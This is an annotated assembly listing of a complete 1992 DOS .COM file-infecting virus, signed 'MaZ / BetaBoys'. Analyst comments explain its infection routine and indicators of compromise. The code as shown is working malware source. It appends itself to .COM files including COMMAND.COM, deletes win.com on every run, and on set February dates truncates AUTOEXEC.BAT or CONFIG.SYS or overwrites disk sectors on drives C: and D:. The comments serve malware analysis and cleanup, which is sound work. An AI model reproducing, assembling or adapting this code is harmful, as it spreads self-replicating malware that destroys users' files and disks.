; MASM/TASM-style source for a single-segment DOS .COM program
; (segment/assume/proc directives; not NASM syntax).
seg_a segment byte public               ; one byte-aligned segment holds both code and data
|
||
|
assume cs:seg_a, ds:seg_a               ; CS and DS both address seg_a
|
||
|
|
||
|
|
||
|
org 100h                                ; .COM images are loaded at offset 100h, after the 256-byte PSP
; ---------------------------------------------------------------------
; ww -- the whole program: a DOS .COM appending file infector with a
; date-triggered destructive payload. Analyst annotations only; every
; instruction and data byte is unchanged.
;
; Layout (addresses by byte count from org 100h, for this image):
;   100h  start   3-byte near jmp + 12 NOPs + INT 20h (stand-in host)
;   111h  loc_2   first byte of the appended body
;   15Fh  loc_3   first instruction after the embedded data
; SI is set at loc_3 to the target of the host's first jmp minus 100h,
; so [si+NNNh] addresses body offset NNNh-100h wherever the body sits.
; The disassembler labels data_8 / data_12 are used the same way, as
; numeric bases (11Bh / 14Ch by byte count) added to SI.
; si+2C8h is the first byte past the 1C8h-byte body and is scratch:
;   +0..+2  first three bytes of the current host (restored at loc_14)
;   +3..+5  first three bytes read from the file being modified
;   +6...   DTA for find-first / find-next (file name at DTA+1Eh = +24h)
;
; Indicators visible in this code:
;   - .COM file starting with E9 (near jmp) to code appended at old EOF
;   - byte 42h ('B') at file offset (size - 6): the already-infected mark
;   - the last three bytes of a modified file are its original first
;     three bytes (what a cleaner needs to restore the entry point)
;   - path strings 'C:\Command.Com', 'C:\Autoexec.Bat', 'C:\Config.Sys',
;     '\windows\win.com'
;   - every run deletes \windows\win.com; on 23, 24, 25 February it
;     truncates AUTOEXEC.BAT, truncates CONFIG.SYS, or issues INT 26h
;     absolute writes to drives C: and D:
; ---------------------------------------------------------------------
ww proc far
|
||
|
|
||
|
start:
|
||
|
jmp loc_2                               ; host's first instruction; its 16-bit displacement is read back at loc_3
|
||
|
db 12 dup (90h)                         ; 12 NOPs standing in for a host program
|
||
|
db 0CDh, 20h                            ; INT 20h (terminate): end of the stand-in host
|
||
|
loc_2:
|
||
|
jmp short loc_3                         ; skip the embedded data
|
||
|
db 90h, 2Ah, 2Eh, 63h, 6Fh, 6Dh         ; NOP, then '*.com': the find-first mask (si+103h)
|
||
|
db 00h, 00h                             ; terminator for the mask, plus one more zero byte
|
||
|
data_8 db 'C:\Command.Com', 0           ; si+10Ah: first file opened at loc_6
|
||
|
db 'C:\Autoexec.Bat', 0                 ; si+119h: recreated empty at loc_10
|
||
|
db 'C:\Config.Sys', 0                   ; si+129h: recreated empty at loc_11
|
||
|
db '\win'                               ; si+137h: start of '\windows\win.com' (deleted at loc_9)
|
||
|
data_12 dw 6F64h                        ; bytes 64h,6Fh = 'do', the middle of that path string
|
||
|
db 'ws\win.com'                         ; rest of the path
|
||
|
db 00h,0E9h, 0Eh, 00h, 90h,0C8h         ; path terminator; E9 0E 00 = jmp template (si+148h); 90h = 1-byte marker buffer (si+14Bh); 0C8h = low byte of body length
|
||
|
db 01h                                  ; high byte: body length word = 01C8h, read via data_12[si]
|
||
|
loc_3:
|
||
|
mov bx,101h
|
||
|
mov ah,[bx]                             ; byte at 101h: displacement low byte (lands in AL after the xchg)
|
||
|
mov bx,102h
|
||
|
mov al,[bx]                             ; byte at 102h: displacement high byte
|
||
|
xchg al,ah                              ; AX = displacement of the host's first jmp
|
||
|
add ax,3                                ; + size of that jmp = body start minus 100h
|
||
|
mov si,ax                               ; SI = delta for every [si+...] reference below
|
||
|
mov ah,1Ah                              ; INT 21h AH=1Ah: set DTA
|
||
|
lea dx,[si+2C8h]
|
||
|
add dx,6                                ; DTA = scratch+6, past the body
|
||
|
int 21h
|
||
|
|
||
|
mov ah,4Eh                              ; AH=4Eh: find first
|
||
|
lea dx,[si+103h]                        ; '*.com', no path: current directory
|
||
|
mov cx,6                                ; attribute mask 06h: hidden + system files included
|
||
|
int 21h
|
||
|
|
||
|
cmp ax,12h                              ; 12h = "no more files"
|
||
|
je loc_7                                ; nothing matched: skip to the payload
|
||
|
lea dx,[si+10Ah]                        ; a match exists, but the first file opened is the fixed path 'C:\Command.Com'
|
||
|
jmp short loc_6
|
||
|
db 90h                                  ; filler NOP
|
||
|
; loc_5: taken when the file just examined already carries the marker
loc_5:
|
||
|
mov ah,4Dh                              ; AH=4Dh: get child return code; the result is not used
|
||
|
int 21h
|
||
|
|
||
|
mov ah,4Fh                              ; AH=4Fh: find next match for '*.com'
|
||
|
int 21h
|
||
|
|
||
|
cmp ax,12h                              ; no more files?
|
||
|
je loc_7
|
||
|
lea dx,[si+2C8h]
|
||
|
add dx,24h                              ; DX -> file name inside the DTA (DTA+1Eh)
|
||
|
; loc_6: DX -> ASCIIZ name of the file to examine
loc_6:
|
||
|
mov ah,3Dh                              ; AH=3Dh: open
|
||
|
mov al,2                                ; access mode 2 = read/write
|
||
|
int 21h
|
||
|
|
||
|
mov bx,ax                               ; BX = handle; the carry/error result is not tested
|
||
|
mov ah,42h                              ; AH=42h: lseek
|
||
|
mov al,2                                ; origin 2 = end of file
|
||
|
mov dx,0
|
||
|
mov cx,0                                ; offset CX:DX = 0
|
||
|
int 21h                                 ; returns DX:AX = file size
|
||
|
|
||
|
|
||
|
push ax                                 ; keep the low word of the size for loc_8
|
||
|
sub ax,6
|
||
|
mov dx,ax                               ; offset = size - 6
|
||
|
mov ah,42h                              ; lseek
|
||
|
mov al,0                                ; origin 0 = start of file
|
||
|
mov cx,0
|
||
|
int 21h
|
||
|
|
||
|
|
||
|
mov ah,3Fh                              ; AH=3Fh: read
|
||
|
mov cx,1                                ; one byte
|
||
|
lea dx,[si+14Bh]                        ; into the marker buffer
|
||
|
int 21h
|
||
|
|
||
|
|
||
|
mov ah,byte ptr data_8+30h[si]          ; the byte just read (same address as si+14Bh by byte count)
|
||
|
cmp ah,42h                              ; 'B' at size-6 => already infected
|
||
|
jne loc_8                               ; not marked: modify this file
|
||
|
jmp short loc_5                         ; marked: try the next match
|
||
|
loc_7:
|
||
|
jmp short loc_9                         ; relay to the payload
|
||
|
db 90h                                  ; filler NOP
|
||
|
; loc_8: modify the open file (handle in BX, size low word on the stack)
loc_8:
|
||
|
mov ah,42h                              ; lseek to offset 0
|
||
|
mov al,0
|
||
|
mov dx,0
|
||
|
mov cx,0
|
||
|
int 21h
|
||
|
|
||
|
|
||
|
mov ax,3F00h                            ; AH=3Fh: read
|
||
|
mov cx,3                                ; the file's first three bytes
|
||
|
lea dx,[si+2C8h]
|
||
|
add dx,3                                ; saved at scratch+3
|
||
|
int 21h
|
||
|
|
||
|
|
||
|
mov ax,4200h                            ; lseek back to offset 0
|
||
|
mov dx,0
|
||
|
mov cx,0
|
||
|
int 21h
|
||
|
|
||
|
|
||
|
pop ax                                  ; low word of the file size
|
||
|
sub ax,3                                ; displacement for a near jmp at offset 0 to the old EOF
|
||
|
mov byte ptr data_8+2Eh[si],al          ; patch the jmp template: displacement low byte
|
||
|
mov byte ptr data_8+2Fh[si],ah          ; displacement high byte
|
||
|
mov ah,40h                              ; AH=40h: write
|
||
|
mov cx,3
|
||
|
lea dx,[si+148h]                        ; the E9 xx xx template
|
||
|
int 21h                                 ; replaces the file's first three bytes
|
||
|
|
||
|
|
||
|
mov ax,4202h                            ; lseek to end of file
|
||
|
mov dx,0
|
||
|
mov cx,0
|
||
|
int 21h
|
||
|
|
||
|
|
||
|
mov ah,40h                              ; write
|
||
|
lea dx,[si+100h]                        ; from the first byte of the running body
|
||
|
mov cx,data_12[si]                      ; body length word (01C8h in this image)
|
||
|
int 21h                                 ; body appended at the old EOF
|
||
|
|
||
|
|
||
|
mov ax,4000h                            ; write
|
||
|
lea dx,[si+2C8h]
|
||
|
add dx,3                                ; the three original bytes saved above
|
||
|
mov cx,3
|
||
|
int 21h                                 ; stored right after the body: the file's last 3 bytes
|
||
|
|
||
|
|
||
|
jmp short loc_9
|
||
|
db 90h                                  ; filler NOP
|
||
|
; loc_9: payload, runs on every execution
loc_9:
|
||
|
mov ah,3Eh                              ; AH=3Eh: close the handle in BX
|
||
|
int 21h
|
||
|
|
||
|
mov ah,41h                              ; AH=41h: delete file
|
||
|
lea dx,[si+137h]                        ; '\windows\win.com' (no drive letter: current drive)
|
||
|
int 21h
|
||
|
|
||
|
mov ah,2Ah                              ; AH=2Ah: get date -> DH = month, DL = day
|
||
|
int 21h
|
||
|
|
||
|
|
||
|
cmp dh,2                                ; February?
|
||
|
jne loc_14                              ; any other month: no further action
|
||
|
cmp dl,17h                              ; day 23
|
||
|
je loc_10
|
||
|
cmp dl,18h                              ; day 24
|
||
|
je loc_11
|
||
|
cmp dl,19h                              ; day 25
|
||
|
je loc_12
|
||
|
jmp short loc_14
|
||
|
db 90h                                  ; filler NOP
|
||
|
; loc_10: 23 February
loc_10:
|
||
|
mov ah,3Ch                              ; AH=3Ch: create file, truncating an existing one
|
||
|
lea dx,[si+119h]                        ; 'C:\Autoexec.Bat'
|
||
|
mov cx,1                                ; attribute 01h = read-only
|
||
|
int 21h                                 ; previous contents are lost
|
||
|
|
||
|
jmp short loc_14
|
||
|
db 90h                                  ; filler NOP
|
||
|
; loc_11: 24 February
loc_11:
|
||
|
mov ah,3Ch                              ; create/truncate
|
||
|
lea dx,[si+129h]                        ; 'C:\Config.Sys'
|
||
|
mov cx,1                                ; attribute 01h = read-only
|
||
|
int 21h                                 ; previous contents are lost
|
||
|
|
||
|
jmp short loc_14
|
||
|
db 90h                                  ; filler NOP
|
||
|
; loc_12: 25 February
loc_12:
|
||
|
mov al,2                                ; INT 26h drive number 2 = C:
|
||
|
loc_13:
|
||
|
mov cx,96h                              ; 96h = 150 sectors
|
||
|
mov dx,0                                ; starting at logical sector 0
|
||
|
int 26h                                 ; absolute disk write; the DS:BX buffer pointer is not set up in this block
|
||
|
|
||
|
|
||
|
|
||
|
inc al                                  ; next drive number
|
||
|
cmp al,4                                ; loop covers drives 2 and 3 (C:, D:)
|
||
|
jne loc_13
|
||
|
; loc_14: hand control back to the host program
loc_14:
|
||
|
mov cx,3
|
||
|
lea ax,[si+2C8h]
|
||
|
mov si,ax                               ; SI -> the current host's saved first three bytes
|
||
|
mov di,100h
|
||
|
rep movsb                               ; copy them back to 100h (uses ES:DI; ES and the direction flag are not set here)
|
||
|
call sub_1                              ; sub_1 jumps to 100h, i.e. runs the restored host
|
||
|
int 20h                                 ; terminate; sub_1 has no ret, so this is not reached through it
|
||
|
|
||
|
ww endp
; ---------------------------------------------------------------------
; sub_1 -- loads DI with the offset of 'start' and jumps there. There
; is no ret, so the return address pushed by the caller's call is never
; consumed. Everything after 'jmp di' is data, not code.
;
; The text below is a stable string indicator for this sample. By byte
; count from org 100h, the three trailing 90h bytes fall just outside
; the 1C8h-byte length the main routine writes out. They occupy the slot
; it reads back as the host's first three bytes. That places the first
; 'B' of the closing 'B.B' six bytes before the end of a modified file,
; matching the 42h check made before a file is modified.
; ---------------------------------------------------------------------
sub_1 proc near
|
||
|
mov di,offset start                     ; DI = offset of 'start' (100h under org 100h)
|
||
|
jmp di                                  ; transfer to the host entry point
|
||
|
db 'Why Windows '                       ; signature text, first part
|
||
|
copyright db '(c)1992 MaZ / BetaBoys B.B' ; signature text; its closing 'B.B' holds the 42h marker byte
|
||
|
db 90h, 90h, 90h                        ; saved-host-bytes slot; NOPs in this image
|
||
|
sub_1 endp
seg_a ends                              ; close the single code/data segment
|
||
|
|
||
|
|
||
|
|
||
|
end start                               ; end of source; program entry point is the label 'start'